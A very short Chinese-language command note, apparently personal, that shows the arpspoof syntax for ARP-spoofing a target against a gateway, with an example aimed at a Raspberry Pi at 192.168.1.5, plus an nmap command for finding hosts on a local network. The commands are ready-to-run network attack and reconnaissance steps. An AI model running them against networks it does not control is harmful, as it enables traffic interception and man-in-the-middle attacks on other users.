命令

$ arpspoof -i <网卡名> -t <目标ip> <网关ip>
如 我要攻击树莓派:
$ arpspoof -i eth0 -t 192.168.1.5 192.168.1.1

获取局域网内其他ip

$ namp <局域网段>
如:
$ nmap 192.168.1.5-11